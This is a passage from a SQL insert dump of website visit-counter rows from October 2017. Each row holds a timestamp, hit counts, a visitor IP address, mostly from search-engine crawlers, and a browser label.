217.182.132.60','other'),(166005,1507939447,1,1,0,0,'51.255.65.5','other'),(166006,1507939847,1,1,0,0,'217.182.132.18','other'),(166007,1507940057,1,1,0,0,'217.182.132.91','other'),(166008,1507940165,1,1,0,0,'217.182.132.25','other'),(166009,1507940522,1,1,0,0,'51.255.65.64','other'),(166010,1507940541,1,1,0,0,'51.255.71.133','other'),(166011,1507940793,1,1,0,0,'217.182.132.186','other'),(166012,1507941013,1,1,0,0,'91.209.11.236','other'),(166013,1507941189,1,1,0,0,'217.182.132.86','other'),(166014,1507941202,1,1,0,0,'217.182.132.84','other'),(166015,1507941365,1,1,0,0,'217.182.132.93','other'),(166016,1507941973,1,1,0,0,'217.182.132.33','other'),(166017,1507942598,1,1,0,0,'37.9.113.138','other'),(166018,1507943143,1,1,0,0,'217.182.132.55','other'),(166019,1507943620,1,1,0,0,'217.182.132.150','other'),(166020,1507944148,1,1,0,0,'217.69.133.2','other'),(166021,1507945296,1,1,0,0,'217.182.132.185','other'),(166022,1507945297,1,1,0,0,'217.69.133.2','other'),(166023,1507945518,1,1,0,0,'217.182.132.14','other'),(166024,1507945983,2,2,0,0,'51.255.65.32','other'),(166025,1507946231,1,1,0,0,'217.182.132.80','other'),(166026,1507946727,1,1,0,0,'137.74.207.108','other'),(166027,1507947807,1,1,0,0,'207.46.13.32','other'),(166028,1507948027,1,1,0,0,'141.8.142.74','other'),(166029,1507948147,1,1,0,0,'51.255.65.60','other'),(166030,1507948648,1,1,0,0,'8.29.198.25','other'),(166031,1507948703,1,1,0,0,'217.182.132.152','other'),(166032,1507948872,1,1,0,0,'178.137.82.201','chrome'),(166033,1507948973,1,1,0,0,'54.165.59.7','other'),(166034,1507949973,1,1,0,0,'178.154.171.88','other'),(166035,1507950246,1,1,0,0,'217.182.132.84','other'),(166036,1507950302,1,1,0,0,'137.74.207.119','other'),(166037,1507951112,1,1,0,0,'217.182.132.55','other'),(166038,1507951520,1,1,0,0,'137.74.207.116','other'),(166039,1507952410,1,1,0,0,'217.182.132.57','other'),(166040,1507952550,1,1,0,0,'217.182.132.58','other'),(166041,1507952610,1,1,0,0,'51.255.65.77','other'),(166042,1507952691,1,1,0,0,'51.255.65.22','other'),(166043,1507952781,1,1,0,0,'217.182.132.66','other'),(166044,1507952957,1,1,0,0,'51.255.65.34','other'),(166045,1507952976,1,1,0,0,'51.255.65.30','other'),(166046,1507953539,1,1,0,0,'141.8.142.74','other'),(166047,1507953781,1,1,0,0,'217.69.133.3','other'),(166048,1507954426,1,1,0,0,'217.182.132.62','other'),(166049,1507954801,1,1,0,0,'51.255.65.6','other'),(166050,1507955466,2,0,2,0,'66.249.70.29',''),(166051,1507955888,1,1,0,0,'141.8.142.74','other'),(166052,1507956029,1,0,1,0,'66.249.70.27',''),(166053,1507956227,1,1,0,0,'137.74.207.114','other'),(166054,1507956447,2,2,0,0,'151.80.27.118','other'),(166055,1507956502,1,1,0,0,'217.182.132.86','other'),(166056,1507957054,1,1,0,0,'91.196.178.36','chrome'),(166057,1507957373,1,1,0,0,'82.145.220.103','chrome'),(166058,1507957513,1,1,0,0,'51.255.65.2','other'),(166059,1507957623,1,0,1,0,'66.249.64.30',''),(166060,1507957963,1,1,0,0,'51.255.65.4','other'),(166061,1507958071,1,1,0,0,'137.74.201.99','other'),(166062,1507958131,1,1,0,0,'217.182.132.66','other'),(166063,1507958330,1,1,0,0,'216.244.66.237','other'),(166064,1507958590,1,1,0,0,'51.255.65.33','other'),(166065,1507958816,1,1,0,0,'51.255.71.131','other'),(166066,1507959446,1,1,0,0,'91.196.178.36','chrome'),(166067,1507959483,1,1,0,0,'8.29.198.26','other'),(166068,1507960060,1,1,0,0,'217.182.132.27','other'),(166069,1507960597,1,1,0,0,'217.182.132.156','other'),(166070,1507960828,1,1,0,0,'51.255.65.50','other'),(166071,1507961393,1,1,0,0,'217.182.132.190','other'),(166072,1507961771,1,1,0,0,'137.74.207.188','other'),(166073,1507961846,5,5,0,0,'216.244.66.237','other'),(166074,1507962721,1,1,0,0,'51.255.65.25','other'),(166075,1507962896,1,1,0,0,'217.182.132.173','other'),(166076,1507962952,1,1,0,0,'51.255.71.110','other'),(166077,1507963075,1,1,0,0,'51.255.65.56','other'),(166078,1507963110,1,1,0,0,'51.255.71.118','other'),(166079,1507963407,1,1,0,0,'217.182.132.85','other'),(166080,1507963428,1,1,0,0,'51.255.71.132','other'),(166081,1507963525,1,1,0,0,'180.76.15.141','other'),(166082,1507963576,1,1,0,0,'51.255.65.68','other'),(166083,1507963607,1,1,0,0,'137.74.207.120','other'),(166084,1507963678,1,1,0,0,'217.182.132.77','other'),(166085,1507963837,1,1,0,0,'51.255.65.93','other'),(166086,1507963864,1,1,0,0,'51.255.65.46','other'),(166087,1507964507,1,1,0,0,'51.255.65.44','other'),(166088,1507964601,1,1,0,0,'217.182.132.177','other'),(166089,1507964602,1,1,0,0,'178.92.250.67','chrome'),(166090,1507964724,1,1,0,0,'217.182.132.178','other'),(166091,1507964806,1,1,0,0,'66.102.9.27','chrome'),(166092,1507964943,1,1,0,0,'164.132.162.158','other'),(166093,1507965178,1,1,0,0,'51.255.65.34','other'),(166094,1507966208,1,1,0,0,'51.255.65.27','other'),(166095,1507966658,1,1,0,0,'137.74.207.119','other'),(166096,1507966688,1,1,0,0,'178.92.250.67','chrome'),(166097,1507966708,1,1,0,0,'217.69.133.4','other'),(166098,1507966830,1,1,0,0,'217.182.132.97','other'),(166099,1507967098,1,1,0,0,'217.182.132.4','other'),(166100,1507967387,1,1,0,0,'51.255.65.9','other'),(166101,1507967450,2,2,0,0,'5.9.144.195','other'),(166102,1507967518,1,1,0,0,'217.182.132.16','other'),(166103,1507967599,1,1,0,0,'51.255.65.43','other'),(166104,1507968165,1,1,0,0,'51.255.65.48','other'),(166105,1507968350,1,1,0,0,'51.255.65.50','other'),(166106,1507968363,1,1,0,0,'216.244.66.237','other'),(166107,1507968558,1,1,0,0,'67.215.230.84','other'),(166108,1507968689,1,1,0,0,'217.182.132.31','other'),(166109,1507968840,1,1,0,0,'217.182.132.20','other'),(166110,1507968907,1,1,0,0,'217.182.132.186','other'),(166111,1507968963,1,1,0,0,'217.182.132.83','other'),(166112,1507969253,1,1,0,0,'217.182.132.53','other'),(166113,1507969262,1,1,0,0,'51.255.65.71','other'),(166114,1507969488,1,1,0,0,'51.255.65.52','other'),(166115,1507969677,1,1,0,0,'217.182.132.72','other'),(166116,1507969687,1,1,0,0,'217.182.132.146','other'),(166117,1507969690,1,1,0,0,'51.255.65.51','other'),(166118,1507969738,1,1,0,0,'178.154.171.88','other'),(166119,1507970324,1,1,0,0,'8.29.198.25','other'),(166120,1507970350,1,1,0,0,'217.182.132.85','other'),(166121,1507971025,1,1,0,0,'51.255.65.21','other'),(166122,1507971244,1,1,0,0,'141.8.142.74','other'),(166123,1507971259,1,1,0,0,'173.234.234.209','other'),(166124,1507971266,1,1,0,0,'217.182.132.7','other'),(166125,1507971375,1,1,0,0,'51.255.65.80','other'),(166126,1507971927,1,1,0,0,'217.182.132.76','other'),(166127,1507972036,1,1,0,0,'217.182.132.60','other'),(166128,1507972224,1,1,0,0,'217.182.132.4','other'),(166129,1507972660,1,1,0,0,'164.132.162.153','other'),(166130,1507972999,1,1,0,0,'217.182.132.69','other'),(166131,1507973310,1,1,0,0,'207.46.13.46','other'),(166132,1507973330,1,1,0,0,'217.182.132.192','other'),(166133,1507973567,1,1,0,0,'164.132.162.188','other'),(166134,1507973672,1,1,0,0,'217.182.132.24','other'),(166135,1507973873,1,1,0,0,'217.182.132.23','other'),(166136,1507974087,1,1,0,0,'51.255.71.122','other'),(166137,1507974333,1,1,0,0,'180.76.15.163','other'),(166138,1507974880,1,1,0,0,'164.132.162.153','other'),(166139,1507975434,1,1,0,0,'217.182.132.30','other'),(166140,1507975588,1,1,0,0,'217.182.132.6','other'),(166141,1507975613,1,1,0,0,'51.255.71.114','other'),(166142,1507975615,1,1,0,0,'51.255.65.36','other'),(166143,1507975618,1,1,0,0,'137.74.207.110','other'),(166144,1507976019,2,2,0,0,'217.182.132.34','other'),(166145,1507976025,1,1,0,0,'188.166.88.57','chrome'),(166146,1507976233,1,0,1,0,'66.249.64.29',''),(166147,1507976456,1,1,0,0,'195.10.210.49','firefox'),(166148,1507976577,2,2,0,0,'198.204.244.90','other'),(166149,1507976602,1,1,0,0,'137.74.207.164','other'),(166150,1507977043,1,1,0,0,'217.182.132.155','other'),(166151,1507977105,1,1,0,0,'217.182.132.53','other'),(166152,1507977494,1,1,0,0,'51.255.71.120','other'),(166153,1507977562,1,1,0,0,'51.255.65.95','other'),(166154,1507977987,2,2,0,0,'216.244.66.237','other'),(166155,1507978223,1,1,0,0,'91.196.178.70','chrome'),(166156,1507978577,1,1,0,0,'164.132.162.153','other'),(166157,1507978732,1,1,0,0,'217.182.132.60','other'),(166158,1507979006,1,1,0,0,'46.211.122.10','chrome'),(166159,1507979249,1,1,0,0,'51.255.65.52','other'),(166160,1507979260,1,1,0,0,'217.182.132.183','other'),(166161,1507979579,1,1,0,0,'217.182.132.4','other'),(166162,1507979703,1,1,0,0,'51.255.65.22','other'),(166163,1507979761,1,1,0,0,'51.255.65.25','other'),(166164,1507979912,1,0,1,0,'66.249.64.30',''),(166165,1507980148,1,1,0,0,'51.255.71.127','other'),(166166,1507980236,1,1,0,0,'207.46.13.85','other'),(166167,1507980247,1,0,1,0,'66.249.70.27',''),(166168,1507980673,1,1,0,0,'217.182.132.177','other'),(166169,1507980730,1,1,0,0,'217.182.132.69','other'),(166170,1507981172,1,1,0,0,'8.29.198.26','other'),(166171,1507982011,1,1,0,0,'66.249.70.29','chrome'),(166172,1507982026,1,1,0,0,'66.249.64.28','chrome'),(166173,1507982051,1,1,0,0,'51.255.65.90','other'),(166174,1507982321,1,1,0,0,'208.83.1.168','other'),(166175,1507982968,1,1,0,0,'51.255.65.76','other'),(166176,1507983091,1,1,0,0,'217.182.132.171','other'),(166177,1507983430,1,1,0,0,'51.255.65.8','other'),(166178,1507983743,1,1,0,0,'91.196.177.140','chrome'),(166179,1507983980,1,1,0,0,'217.182.132.154','other'),(166180,1507984204,2,2,0,0,'91.209.11.236','other'),(166181,1507984248,1,1,0,0,'51.255.65.14','other'),(166182,1507984464,1,0,1,0,'66.249.64.30',''),(166183,1507984658,1,1,0,0,'51.255.71.126','other'),(166184,1507984776,1,1,0,0,'216.244.66.237','other'),(166185,1507984781,1,1,0,0,'217.182.132.182','other'),(166186,1507985478,1,1,0,0,'208.83.1.168','other'),(166187,1507985623,1,1,0,0,'51.255.65.67','other'),(166188,1507985857,1,1,0,0,'141.8.142.74','other'),(166189,1507986400,1,1,0,0,'51.255.65.65','other'),(166190,1507986428,1,1,0,0,'51.255.64.106','other'),(166191,1507986720,1,1,0,0,'51.255.65.56','other'),(166192,1507987068,1,0,1,0,'66.249.64.30',''),(166193,1507987799,1,1,0,0,'51.255.65.54','other'),(166194,1507988235,1,1,0,0,'217.69.133.2','other'),(166195,1507988396,1,1,0,0,'51.255.65.15','other'),(166196,1507989482,1,1,0,0,'51.255.65.53','other'),(166197,1507989716,1,1,0,0,'217.182.132.63','other'),(166198,1507989882,1,1,0,0,'141.8.142.74','other'),(166199,1507989886,2,2,0,0,'178.154.171.88','other'),(166200,1507990120,1,1,0,0,'137.74.207.159','other'),(166201,1507990121,1,1,0,0,'51.255.65.56','other'),(166202,1507990333,1,1,0,0,'217.182.132.16','other'),(166203,1507990881,1,1,0,0,'51.255.65.45','other'),(166204,1507991015,1,1,0,0,'217.182.132.22','other'),(166205,1507991088,1,1,0,0,'176.31.231.10','other'),(166206,1507991461,1,1,0,0,'178.159.37.105','chrome'),(166207,1507991640,1,1,0,0,'93.74.212.147','firefox'),(166208,1507991650,1,1,0,0,'51.255.65.8','other'),(166209,1507991670,1,1,0,0,'51.255.71.128','other'),(166210,1507991739,1,1,0,0,'91.196.178.163','chrome'),(166211,1507992019,1,1,0,0,'8.29.198.26','other'),(166212,1507992022,1,1,0,0,'164.132.162.153','other'),(166213,1507992096,1,1,0,0,'51.255.65.86','other'),(166214,1507992171,1,1,0,0,'217.182.132.147','other'),(166215,1507992719,1,1,0,0,'51.255.65.73','other'),(166216,1507993331,1,0,1,0,'66.249.64.29',''),(166217,1507993875,1,1,0,0,'173.234.234.205','other'),(166218,1507994066,1,1,0,0,'40.77.167.88','other'),(166219,1507994395,1,1,0,0,'217.182.132.70','other'),(166220,1507994428,1,1,0,0,'51.255.65.32','other'),(166221,1507994508,1,1,0,0,'141.8.142.74','other'),(166222,1507995107,1,1,0,0,'40.77.167.88','other'),(166223,1507995144,1,1,0,0,'217.182.132.56','other'),(166224,1507995288,1,1,0,0,'173.239.216.3','firefox'),(166225,1507995580,1,1,0,0,'51.255.65.79','other'),(166226,1507995619,1,1,0,0,'217.182.132.90','other'),(166227,1507995969,1,1,0,0,'137.74.207.109','other'),(166228,1507996725,1,1,0,0,'180.76.15.163','other'),(166229,1507996898,1,1,0,0,'51.255.71.126','other'),(166230,1507997149,1,1,0,0,'217.182.132.17','other'),(166231,1507997591,1,1,0,0,'51.255.65.90','other'),(166232,1507997969,1,1,0,0,'51.255.71.111','other'),(166233,1507998191,1,1,0,0,'217.182.132.16','other'),(166234,1507999034,1,1,0,0,'217.182.132.85','other'),(166235,1507999275,1,1,0,0,'217.182.132.87','other'),(166236,1507999457,1,1,0,0,'180.76.15.150','other'),(166237,1507999756,1,1,0,0,'164.132.162.159','other'),(166238,1507999967,1,1,0,0,'51.255.65.224','other'),(166239,1508000039,1,1,0,0,'164.132.162.188','other'),(166240,1508000155,1,1,0,0,'51.255.65.84','other'),(166241,1508000248,1,0,1,0,'66.249.64.30',''),(166242,1508000378,1,1,0,0,'51.255.65.79','other'),(166243,1508000395,1,1,0,0,'217.182.132.27','other'),(166244,1508000970,1,1,0,0,'51.255.71.98','other'),(166245,1508000999,1,1,0,0,'216.244.66.237','other'),(166246,1508001250,1,1,0,0,'217.182.132.151','other'),(166247,1508001424,28,28,0,0,'192.99.203.35','other'),(166248,1508001804,1,1,0,0,'51.255.65.33','other'),(166249,1508001907,1,1,0,0,'51.255.65.96','other'),(166250,1508002719,1,1,0,0,'51.255.65.92','other'),(166251,1508002860,1,1,0,0,'8.29.198.27','other'),(166252,1508002973,1,1,0,0,'51.255.65.65','other'),(166253,1508003956,1,1,0,0,'217.182.132.190','other'),(166254,1508003973,1,1,0,0,'108.59.8.70','other'),(166255,1508004006,1,1,0,0,'91.209.11.236','other'),(166256,1508004442,1,1,0,0,'216.244.66.237','other'),(166257,1508005642,1,1,0,0,'40.77.167.88','other'),(166258,1508006025,1,1,0,0,'37.73.244.232','chrome'),(166259,1508006276,1,1,0,0,'141.8.142.74','other'),(166260,1508006515,1,1,0,0,'217.182.132.6','other'),(166261,1508006819,1,0,1,0,'66.249.64.30',''),(166262,1508007686,2,2,0,0,'216.244.66.237','other'),(166263,1508009040,1,1,0,0,'137.74.207.108','other'),(166264,1508009047,1,1,0,0,'51.255.71.111','other'),(166265,1508009234,1,1,0,0,'51.255.65.25','other'),(166266,1508009552,1,1,0,0,'217.182.132.15','other'),(166267,1508009722,1,1,0,0,'51.255.71.128','other'),(166268,1508010262,1,1,0,0,'51.255.65.55','other'),(166269,1508010778,1,1,0,0,'217.182.132.5','other'),(166270,1508010791,1,1,0,0,'37.9.113.157','other'),(166271,1508011658,1,1,0,0,'46.48.13.161','other'),(166272,1508012169,1,1,0,0,'51.255.65.21','other'),(166273,1508012249,1,1,0,0,'40.77.167.13','other'),(166274,1508012280,1,1,0,0,'164.132.162.164','other'),(166275,1508012761,1,1,0,0,'51.255.65.7','other'),(166276,1508013002,1,1,0,0,'151.80.27.118','other'),(166277,1508013214,1,1,0,0,'51.255.65.46','other'),(166278,1508013397,1,1,0,0,'51.255.65.30','other'),(166279,1508013409,1,1,0,0,'87.250.224.46','other'),(166280,1508013477,1,1,0,0,'51.255.65.45','other'),(166281,1508013699,1,1,0,0,'8.29.198.25','other'),(166282,1508014045,1,1,0,0,'216.244.66.237','other'),(166283,1508014363,1,1,0,0,'141.8.142.74','other'),(166284,1508014630,1,1,0,0,'51.255.65.25','other'),(166285,1508015289,1,1,0,0,'5.9.60.241','other'),(166286,1508015315,1,1,0,0,'217.182.132.155','other'),(166287,1508015811,1,1,0,0,'217.182.132.14','other'),(166288,1508015862,1,1,0,0,'51.255.71.110','other'),(166289,1508016108,1,1,0,0,'51.255.65.93','other'),(166290,1508017514,1,1,0,0,'51.255.65.47','other'),(166291,1508018051,1,0,1,0,'66.249.64.29',''),(166292,1508018219,1,1,0,0,'217.182.132.27','other'),(166293,1508018343,1,1,0,0,'40.77.167.13','other'),(166294,1508018555,1,0,1,0,'66.249.64.28',''),(166295,1508019642,1,1,0,0,'141.8.142.74','other'),(166296,1508019713,1,1,0,0,'217.182.132.240','other'),(166297,1508019834,1,1,0,0,'51.255.65.32','other'),(166298,1508019882,1,1,0,0,'217.182.132.25','other'),(166299,1508019973,1,1,0,0,'51.255.65.91','other'),(166300,1508020800,1,1,0,0,'51.255.65.75','other'),(166301,1508020929,1,1,0,0,'51.255.65.94','other'),(166302,1508021128,1,1,0,0,'178.154.171.88','other'),(166303,1508021283,1,1,0,0,'51.255.65.76','other'),(166304,1508021692,1,1,0,0,'141.8.142.74','other'),(166305,1508021965,1,1,0,0,'217.182.132.149','other'),(166306,1508022028,1,1,0,0,'51.255.71.127','other'),(166307,1508022340,1,1,0,0,'51.255.71.98','other'),(166308,1508022685,1,1,0,0,'217.182.132.78','other'),(166309,1508023405,1,1,0,0,'178.154.171.88','other'),(166310,1508023810,1,1,0,0,'146.185.223.146','chrome'),(166311,1508023883,1,1,0,0,'46.188.79.187','msie'),(166312,1508024548,1,1,0,0,'8.29.198.25','other'),(166313,1508024621,1,1,0,0,'141.8.142.74','other'),(166314,1508024692,1,1,0,0,'213.180.203.7','other'),(166315,1508024749,1,0,1,0,'66.249.64.29',''),(166316,1508024786,1,1,0,0,'137.74.201.108','other'),(166317,1508025053,1,1,0,0,'157.55.39.45','other'),(166318,1508025345,1,1,0,0,'180.76.15.7','other'),(166319,1508025586,1,1,0,0,'217.182.132.191','other'),(166320,1508025692,1,1,0,0,'180.76.15.18','other'),(166321,1508025872,1,1,0,0,'51.255.65.27','other'),(166322,1508026004,1,1,0,0,'87.250.224.46','other'),(166323,1508026157,1,1,0,0,'141.8.132.19','other'),(166324,1508026466,1,1,0,0,'217.182.132.188','other'),(166325,1508026561,1,0,1,0,'66.249.64.30',''),(166326,1508026832,1,1,0,0,'37.9.113.182','other'),(166327,1508026891,1,1,0,0,'141.8.142.74','other'),(166328,1508026920,1,1,0,0,'178.137.164.33','chrome'),(166329,1508027326,1,1,0,0,'217.182.132.171','other'),(166330,1508027785,1,1,0,0,'51.255.71.132','other'),(166331,1508028600,1,1,0,0,'87.250.224.46','other'),(166332,1508028909,1,1,0,0,'51.255.71.129','other'),(166333,1508028920,2,0,2,0,'66.249.64.29',''),(166334,1508028949,1,1,0,0,'164.132.162.158','other'),(166335,1508029333,1,1,0,0,'157.55.39.7','other'),(166336,1508029490,1,1,0,0,'141.8.142.74','other'),(166337,1508029723,1,1,0,0,'217.182.132.52','other'),(166338,1508029913,1,1,0,0,'217.182.132.87','other'),(166339,1508030445,1,1,0,0,'141.8.142.74','other'),(166340,1508030710,1,1,0,0,'217.182.132.192','other'),(166341,1508030841,1,1,0,0,'178.154.171.88','other'),(166342,1508031612,1,1,0,0,'217.182.132.15','other'),(166343,1508031708,1,1,0,0,'164.132.162.159','other'),(166344,1508031914,1,1,0,0,'51.255.65.41','other'),(166345,1508031920,1,1,0,0,'141.8.142.74','other'),(166346,1508031996,1,1,0,0,'199.30.24.21','other'),(166347,1508033056,1,1,0,0,'87.250.224.46','other'),(166348,1508033200,1,1,0,0,'137.74.207.188','other'),(166349,1508033352,1,1,0,0,'141.8.142.74','other'),(166350,1508033808,1,1,0,0,'51.255.65.79','other'),(166351,1508033903,1,1,0,0,'217.182.132.241','other'),(166352,1508034115,1,1,0,0,'51.255.65.95','other'),(166353,1508034377,1,1,0,0,'51.255.65.48','other'),(166354,1508034430,1,1,0,0,'51.255.65.22','other'),(166355,1508034600,1,1,0,0,'51.255.71.114','other'),(166356,1508034796,1,1,0,0,'178.154.171.88','other'),(166357,1508035396,1,1,0,0,'8.29.198.26','other'),(166358,1508035436,1,1,0,0,'51.255.65.80','other'),(166359,1508035472,1,1,0,0,'141.8.142.74','other'),(166360,1508035977,1,1,0,0,'137.74.207.188','other'),(166361,1508036145,1,1,0,0,'51.255.65.13','other'),(166362,1508036204,1,1,0,0,'217.182.132.147','other'),(166363,1508036546,1,1,0,0,'51.255.71.129','other'),(166364,1508036803,1,1,0,0,'51.255.65.6','other'),(166365,1508037035,1,1,0,0,'128.68.18.162','other'),(166366,1508037084,1,0,1,0,'66.249.64.30',''),(166367,1508037226,1,1,0,0,'109.195.93.246','msie'),(166368,1508037325,2,2,0,0,'141.8.142.74','other'),(166369,1508037615,1,1,0,0,'217.182.132.95','other'),(166370,1508037812,1,1,0,0,'137.74.207.110','other'),(166371,1508038052,1,1,0,0,'51.255.65.55','other'),(166372,1508038067,1,1,0,0,'217.182.132.57','other'),(166373,1508038113,1,1,0,0,'217.182.132.67','other'),(166374,1508038322,1,1,0,0,'51.255.65.57','other'),(166375,1508038449,1,1,0,0,'217.182.132.184','other'),(166376,1508038486,1,1,0,0,'178.154.171.88','other'),(166377,1508038549,1,1,0,0,'217.182.132.191','other'),(166378,1508038639,1,1,0,0,'137.74.207.161','other'),(166379,1508038699,1,1,0,0,'51.255.65.53','other'),(166380,1508038896,1,1,0,0,'217.182.132.172','other'),(166381,1508039095,1,0,1,0,'66.249.64.30',''),(166382,1508039493,1,1,0,0,'137.74.207.108','other'),(166383,1508039653,2,2,0,0,'141.8.142.74','other'),(166384,1508039951,1,1,0,0,'51.255.65.94','other'),(166385,1508040034,1,0,1,0,'66.249.64.30',''),(166386,1508040229,1,1,0,0,'217.182.132.79','other'),(166387,1508040629,1,1,0,0,'164.132.162.157','other'),(166388,1508040854,1,1,0,0,'37.9.113.110','other'),(166389,1508041124,1,1,0,0,'51.255.65.62','other'),(166390,1508041570,1,1,0,0,'51.255.65.34','other'),(166391,1508041698,1,1,0,0,'217.69.133.194','other'),(166392,1508042099,1,1,0,0,'217.182.132.64','other'),(166393,1508042239,1,1,0,0,'137.74.203.194','other'),(166394,1508042428,1,1,0,0,'217.182.132.35','other'),(166395,1508042443,1,1,0,0,'217.182.132.95','other'),(166396,1508042639,1,1,0,0,'51.255.65.77','other'),(166397,1508042809,1,1,0,0,'217.182.132.33','other'),(166398,1508042872,1,1,0,0,'37.9.113.182','other'),(166399,1508042884,1,1,0,0,'51.255.65.25','other'),(166400,1508042962,1,1,0,0,'87.250.224.46','other'),(166401,1508043000,1,1,0,0,'217.182.132.82','other'),(166402,1508043441,1,1,0,0,'217.182.132.25','other'),(166403,1508043616,1,1,0,0,'217.182.132.30','other'),(166404,1508044289,1,1,0,0,'51.255.65.29','other'),(166405,1508044388,1,1,0,0,'164.132.164.180','other'),(166406,1508044426,1,1,0,0,'217.182.132.50','other'),(166407,1508044639,1,0,1,0,'66.249.64.29',''),(166408,1508044661,1,1,0,0,'217.69.133.9','other'),(166409,1508044768,1,1,0,0,'217.182.132.23','other'),(166410,1508044805,1,1,0,0,'217.182.132.241','other'),(166411,1508045161,1,1,0,0,'141.8.142.74','other'),(166412,1508045891,1,1,0,0,'51.255.71.129','other'),(166413,1508046238,1,1,0,0,'8.29.198.27','other'),(166414,1508046267,1,1,0,0,'51.255.65.94','other'),(166415,1508046640,1,0,1,0,'66.249.64.28',''),(166416,1508047959,1,1,0,0,'141.8.142.74','other'),(166417,1508048811,1,1,0,0,'178.154.171.88','other'),(166418,1508048869,1,0,1,0,'66.249.64.28',''),(166419,1508048997,1,1,0,0,'51.255.71.123','other'),(166420,1508049548,1,1,0,0,'137.74.207.101','other'),(166421,1508050016,1,1,0,0,'217.182.132.57','other'),(166422,1508050553,1,1,0,0,'217.182.132.146','other'),(166423,1508050585,1,1,0,0,'217.182.132.88','other'),(166424,1508051619,1,1,0,0,'66.249.70.25','chrome'),(166425,1508052186,2,2,0,0,'178.154.171.88','other'),(166426,1508052243,1,1,0,0,'87.250.224.46','other'),(166427,1508052768,1,0,1,0,'66.249.64.28',''),(166428,1508052948,1,1,0,0,'82.145.220.235','chrome'),(166429,1508053550,1,1,0,0,'51.255.65.87','other'),(166430,1508053681,1,1,0,0,'51.255.65.42','other'),(166431,1508053801,1,1,0,0,'46.200.98.48','firefox'),(166432,1508054521,1,1,0,0,'217.182.132.149','other'),(166433,1508054720,1,1,0,0,'141.8.142.74','other'),(166434,1508054750,1,1,0,0,'178.92.250.67','chrome'),(166435,1508054803,1,1,0,0,'217.182.132.240','other'),(166436,1508055039,1,1,0,0,'157.55.39.163','other'),(166437,1508055406,1,1,0,0,'51.255.65.92','other'),(166438,1508055407,1,1,0,0,'37.113.39.51','chrome'),(166439,1508056067,1,1,0,0,'87.250.224.46','other'),(166440,1508056197,1,0,1,0,'66.249.70.25',''),(166441,1508056264,1,1,0,0,'51.255.65.39','other'),(166442,1508056352,1,1,0,0,'178.154.171.88','other'),(166443,1508056357,1,0,1,0,'66.249.64.30',''),(166444,1508056480,1,1,0,0,'51.255.65.26','other'),(166445,1508056502,1,1,0,0,'217.182.132.183','other'),(166446,1508056810,1,1,0,0,'141.8.142.74','other'),(166447,1508056921,1,1,0,0,'51.255.65.50','other'),(166448,1508057082,1,1,0,0,'8.29.198.27','other'),(166449,1508057137,1,1,0,0,'217.182.132.72','other'),(166450,1508057193,1,0,1,0,'66.249.70.27',''),(166451,1508057528,1,1,0,0,'217.182.132.5','other'),(166452,1508057575,1,1,0,0,'217.182.132.52','other'),(166453,1508058130,1,1,0,0,'37.9.113.115','other'),(166454,1508058353,1,1,0,0,'141.8.142.74','other'),(166455,1508058482,1,1,0,0,'178.154.171.88','other'),(166456,1508058661,1,1,0,0,'217.69.133.203','other'),(166457,1508058959,1,0,1,0,'66.249.64.28',''),(166458,1508059455,2,0,2,0,'66.249.64.30',''),(166459,1508059795,1,1,0,0,'66.249.70.29','chrome'),(166460,1508059812,1,1,0,0,'66.249.64.29','chrome'),(166461,1508060417,1,1,0,0,'141.8.142.74','other'),(166462,1508060481,1,1,0,0,'217.182.132.182','other'),(166463,1508060688,1,1,0,0,'217.182.132.56','other'),(166464,1508060867,1,1,0,0,'178.154.171.88','other'),(166465,1508061409,1,1,0,0,'217.182.132.81','other'),(166466,1508061543,3,3,0,0,'141.8.142.74','other'),(166467,1508061957,3,3,0,0,'178.154.171.88','other'),(166468,1508062360,1,1,0,0,'217.182.132.34','other'),(166469,1508062715,1,1,0,0,'217.182.132.91','other'),(166470,1508063025,1,1,0,0,'217.182.132.18','other'),(166471,1508063096,1,1,0,0,'51.255.65.57','other'),(166472,1508063153,1,1,0,0,'37.112.35.30','msie'),(166473,1508063351,1,1,0,0,'217.182.132.6','other'),(166474,1508063356,2,2,0,0,'144.76.8.231','other'),(166475,1508063487,1,1,0,0,'51.255.65.71','other'),(166476,1508063983,1,1,0,0,'178.154.171.88','other'),(166477,1508064174,1,1,0,0,'87.250.224.46','other'),(166478,1508064728,1,1,0,0,'217.182.132.70','other'),(166479,1508065191,1,1,0,0,'151.80.27.116','other'),(166480,1508065269,1,1,0,0,'51.255.71.118','other'),(166481,1508065409,1,0,1,0,'66.249.64.29',''),(166482,1508065723,1,1,0,0,'141.8.142.74','other'),(166483,1508065946,1,1,0,0,'51.255.65.55','other'),(166484,1508066096,1,1,0,0,'51.255.65.69','other'),(166485,1508066383,2,2,0,0,'217.182.132.79','other'),(166486,1508066583,1,1,0,0,'217.182.132.71','other'),(166487,1508066622,1,1,0,0,'137.74.207.114','other'),(166488,1508066790,1,1,0,0,'51.255.65.2','other'),(166489,1508066802,1,1,0,0,'164.132.162.157','other'),(166490,1508067049,1,1,0,0,'141.8.142.74','other'),(166491,1508067174,1,1,0,0,'51.255.65.17','other'),(166492,1508067271,1,1,0,0,'91.196.178.36','chrome'),(166493,1508067740,1,1,0,0,'178.154.171.88','other'),(166494,1508067925,1,1,0,0,'8.29.198.26','other'),(166495,1508067948,1,1,0,0,'217.182.132.84','other'),(166496,1508068071,1,1,0,0,'51.255.65.45','other'),(166497,1508068444,1,1,0,0,'51.255.65.89','other'),(166498,1508069015,1,1,0,0,'217.182.132.90','other'),(166499,1508069475,3,3,0,0,'91.209.11.236','other'),(166500,1508069738,1,1,0,0,'51.255.71.98','other'),(166501,1508069849,1,1,0,0,'91.196.178.36','chrome'),(166502,1508070028,2,2,0,0,'217.182.132.77','other'),(166503,1508070417,1,1,0,0,'217.69.133.203','other'),(166504,1508070642,1,1,0,0,'51.255.65.82','other'),(166505,1508070747,1,1,0,0,'91.196.178.129','chrome'),(166506,1508070836,1,1,0,0,'51.255.65.63','other'),(166507,1508070845,1,1,0,0,'195.211.23.208','other'),(166508,1508071134,1,1,0,0,'217.182.132.66','other'),(166509,1508071246,1,1,0,0,'141.8.142.74','other'),(166510,1508071318,1,1,0,0,'178.92.250.67','chrome'),(166511,1508071552,1,1,0,0,'51.255.71.123','other'),(166512,1508071727,1,1,0,0,'217.182.132.174','other'),(166513,1508071778,1,1,0,0,'91.209.11.236','other'),(166514,1508071990,1,1,0,0,'54.165.59.7','other'),(166515,1508072310,1,1,0,0,'217.182.132.150','other'),(166516,1508072347,1,1,0,0,'137.74.207.110','other'),(166517,1508072366,1,1,0,0,'51.255.65.26','other'),(166518,1508072595,1,1,0,0,'217.182.132.179','other'),(166519,1508072807,1,1,0,0,'51.255.65.70','other'),(166520,1508072929,1,1,0,0